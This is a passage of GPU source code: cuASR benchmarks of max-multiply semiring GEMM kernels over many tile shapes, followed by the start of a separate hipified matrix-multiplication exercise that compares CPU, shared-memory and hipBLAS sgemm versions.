state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x8x1_2x2_8x4_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 4 // Threadblock: 32 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_16x16x1_4x2_4x8_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, 
precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_16x16x1_4x2_4x8_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 4 // Threadblock: 32 x 128 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x8_16x32x1_4x4_4x8_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 128, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x8_16x32x1_4x4_4x8_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 2 x 4 // Threadblock: 64 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_32x16x1_4x4_8x4_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 16, 8>; using 
InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_32x16x1_4x4_8x4_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 2 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_8x16x1_2x2_4x8_4x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_8x16x1_2x2_4x8_4x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 2 // Threadblock: 64 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_16x16x1_4x2_4x8_4x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; 
using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_16x16x1_4x2_4x8_4x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 2 // Threadblock: 64 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_16x32x1_4x4_4x8_4x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_16x32x1_4x4_4x8_4x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 4 x 2 // Threadblock: 128 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void 
BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x8_32x16x1_4x4_8x4_4x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<128, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x8_32x16x1_4x4_8x4_4x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 4 // Threadblock: 32 x 64 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x16_8x16x1_2x2_4x8_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 64, 16>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x16_8x16x1_2x2_4x8_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements 
/ Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 4 // Threadblock: 32 x 128 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x16_8x32x1_2x4_4x8_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 128, 16>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x16_8x32x1_2x4_4x8_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 8 x 4 // Warps / Block: 4 x 4 // Threadblock: 64 x 32 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x16_16x8x1_2x2_8x4_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 32, 16>; using WarpShape = cutlass::gemm::GemmShape<16, 8, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } 
BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x16_16x8x1_2x2_8x4_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 4 // Threadblock: 64 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_16x16x1_4x2_4x8_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_16x16x1_4x2_4x8_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 8 x 4 // Warps / Block: 4 x 4 // Threadblock: 128 x 32 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x16_32x8x1_4x2_8x4_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<128, 32, 16>; using WarpShape = cutlass::gemm::GemmShape<32, 8, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); 
cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x16_32x8x1_4x2_8x4_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif
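////////////////////////////////////////////////////////////////////////////////
// Editor's note (hedged sketch, not part of cuASR): every benchmark above
// instantiates cuasr::gemm::device::Srgemm with AddOp = cuasr::maximum and
// MultOp = cuasr::multiplies, i.e. a (max, *) semiring product over doubles in
// column-major layout, and reports 2*N^3 "Flop" per iteration (one multiply and
// one max per inner-product term). A minimal host-side reference of that
// product, useful for spot-checking any one tile configuration, could look like
// the following; the function name srgemm_maxmul_reference is illustrative only.
#include <algorithm>
#include <limits>
#include <vector>

// C(i,j) = max_k A(i,k) * B(k,j), all matrices N x N, column-major.
static void srgemm_maxmul_reference(int N,
                                    std::vector<double> const &A,
                                    std::vector<double> const &B,
                                    std::vector<double> &C) {
  for (int j = 0; j < N; ++j) {
    for (int i = 0; i < N; ++i) {
      double acc = -std::numeric_limits<double>::infinity();  // identity of max
      for (int k = 0; k < N; ++k) {
        acc = std::max(acc, A[i + k * N] * B[k + j * N]);     // "multiply" then "add"
      }
      C[i + j * N] = acc;
    }
  }
}
////////////////////////////////////////////////////////////////////////////////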
e5fbec3f0e75d0718662e41e7bb4a83a3261d40c.hip
// !!! This is a file automatically generated by hipify!!! #include <hip/hip_runtime.h> #include <stdio.h> #include <hiprand/hiprand.h> #include <sys/time.h> #include <errno.h> #include <unistd.h> #include <rocblas.h> #include <iostream> #include <unistd.h> #ifndef TILE_SIZE #define TILE_SIZE 16 #endif #define THRESHOLD 1e-3 /* CUDA layout */ dim3 grid(1); dim3 block(TILE_SIZE, TILE_SIZE); /* from cuda samples */ void checkGpuError(hipError_t result, char const *const func, const char *const file, int const line) { if(result!=hipSuccess) { \ fprintf(stderr, "Cuda failure %s:%d: '%s'\n",__FILE__,__LINE__,hipGetErrorString(result)); exit(1); } } // This will output the proper CUDA error strings in the event // that a CUDA host call returns an error #define checkCudaErrors(val) checkGpuError((val), #val, __FILE__, __LINE__) /* https://gist.github.com/Tener/803377 */ #define CURAND_CALL(x) { \ do { \ if((x) != HIPRAND_STATUS_SUCCESS) { \ printf("Error at %s:%d\n",__FILE__,__LINE__); \ exit(1); \ } \ } while(0); \ } /* time diff in ms */ double elapsed(struct timeval t0, struct timeval t1) { return (double)(t1.tv_sec - t0.tv_sec) * 1000.0L + (double)(t1.tv_usec - t0.tv_usec) / 1000.0L; } /* compare matrix with abs difference */ void compare_matrix(float *matrix_a, float *matrix_b, long size, double threshold) { for (long i = 0; i < size*size; i++) { if (fabs((double)matrix_a[i] - (double)matrix_b[i]) > threshold) { fprintf(stderr, "Compare matrix failed: %f vs %f at i = %ld\n", matrix_a[i], matrix_b[i], i); exit(1); } } printf("Matrices equivalent \n"); } /* init matrix with hiprand */ void init_matrix(float *matrix, long size, unsigned long long seed) { float *d_matrix = NULL; hiprandGenerator_t gen; checkCudaErrors(hipMalloc(&d_matrix, sizeof(float)*size*size)); CURAND_CALL(hiprandCreateGenerator(&gen, HIPRAND_RNG_PSEUDO_DEFAULT)); CURAND_CALL(hiprandSetPseudoRandomGeneratorSeed(gen, seed)); CURAND_CALL(hiprandGenerateUniform(gen, d_matrix, size*size)); checkCudaErrors(hipMemcpy(matrix, d_matrix, sizeof(float)*size*size, hipMemcpyDeviceToHost)); checkCudaErrors(hipFree(d_matrix)); CURAND_CALL(hiprandDestroyGenerator(gen)); } /* C = AB on CPU with re-ordered loop */ void cpu_sgemm(float *C, float *A, float *B, long size) { struct timeval t0, t1; gettimeofday(&t0, NULL); for (long i = 0; i < size; i++) { for (long k = 0; k < size; k++) { for (long j = 0; j < size; j++) { C[i * size + j] += A[i * size + k] * B[k * size + j]; } } } gettimeofday(&t1, NULL); printf("CPU matmul:\t\t\t%f ms\n", elapsed(t0, t1)); } /* matmul kernel with global memory */ __global__ void naive_sgemm_kernel(float *C, float *A, float *B, long size) { const long i = blockIdx.x * blockDim.x + threadIdx.x; const long j = blockIdx.y * blockDim.y + threadIdx.y; float val = 0.0; if (i >= size || j >= size) return; for (long k = 0; k < size; k++) { val += A[i * size + k] * B[k * size + j]; } C[i * size + j] += val; } /* matmul with global memory */ void naive_sgemm(float *C, float *A, float *B, long size) { struct timeval t0, t1; gettimeofday(&t0, NULL); hipLaunchKernelGGL(( naive_sgemm_kernel), dim3(grid), dim3(block), 0, 0, C, A, B, size); checkCudaErrors(hipPeekAtLastError()); checkCudaErrors(hipDeviceSynchronize()); gettimeofday(&t1, NULL); printf("GPU matmul (global memory):\t%f ms\n", elapsed(t0, t1)); } /* matmul kernel with shared memory */ __global__ void shared_sgemm_kernel(float *C, float *A, float *B, long size) { const long col = blockIdx.x * blockDim.x + threadIdx.x; const long row = blockIdx.y * blockDim.y + 
threadIdx.y; float val = 0.0; /* TODO declare shared memory with size TILE_SIZE x TILE_SIZE */ __shared__ float tile_A[TILE_SIZE][TILE_SIZE]; __shared__ float tile_B[TILE_SIZE][TILE_SIZE]; if (col < size && row < size) { const long local_col = blockIdx.x * TILE_SIZE + threadIdx.x; const long local_row = blockIdx.y * TILE_SIZE + threadIdx.y; for (long m = 0; m < size / TILE_SIZE; ++m) { tile_A[threadIdx.y][threadIdx.x] = A[local_row * size + (m * TILE_SIZE + threadIdx.x)]; tile_B[threadIdx.y][threadIdx.x] = B[(m * TILE_SIZE + threadIdx.y) * size + local_col]; __syncthreads(); /* TODO introduce a pragma directive that can potentially improve performance here */ #pragma unroll for (long k = 0; k < TILE_SIZE; ++k) { val += tile_A[threadIdx.y][k] * tile_B[k][threadIdx.x]; /* TODO Perform multiplication here */ } __syncthreads(); } C[local_row * size + local_col] += val; } } /* matmul with shared memory */ void shared_sgemm(float *C, float *A, float *B, long size) { struct timeval t0, t1; gettimeofday(&t0, NULL); hipLaunchKernelGGL(( shared_sgemm_kernel), dim3(grid), dim3(block), 0, 0, C, A, B, size); checkCudaErrors(hipPeekAtLastError()); checkCudaErrors(hipDeviceSynchronize()); gettimeofday(&t1, NULL); printf("GPU matmul (shared memory):\t%f ms\n", elapsed(t0, t1)); } /* cuBLAS */ void cublas_sgemm(float *C, float *A, float *B, long size) { //printf("Inside cublas \n"); struct timeval t0, t1; float alpha = 1.0; float beta = 0.0; //printf("dddasdasd\n"); hipblasHandle_t handle; hipblasCreate(&handle); //hipblasSetPointerMode(handle, HIPBLAS_POINTER_MODE_DEVICE); //printf("made it furtherrrr\n"); gettimeofday(&t0, NULL); /* TODO fill in the blanks, do C = BA instead of C = AB */ hipblasSgemm(handle, HIPBLAS_OP_N, HIPBLAS_OP_N, size, size, size, &alpha,B,size,A,size,&beta,C,size); checkCudaErrors(hipDeviceSynchronize()); gettimeofday(&t1, NULL); hipblasDestroy(handle); printf("GPU cuBLAS matmul:\t\t%f ms\n", elapsed(t0, t1)); } void print_usage(char *program) { fprintf(stderr, "Usage: %s [-s size] [-v to verify with CPU sgemm]\n", program); } int main(int argc, char *argv[]) { int opt; long size = 64*2*2*2*2*2; bool verify = false; while ((opt = getopt(argc, argv, "s:v")) != -1) { switch (opt) { case 's': size = atol(optarg); if (size % TILE_SIZE != 0) { fprintf(stderr, "Error: Matrix size must be a multiple of tile size %d.\n", 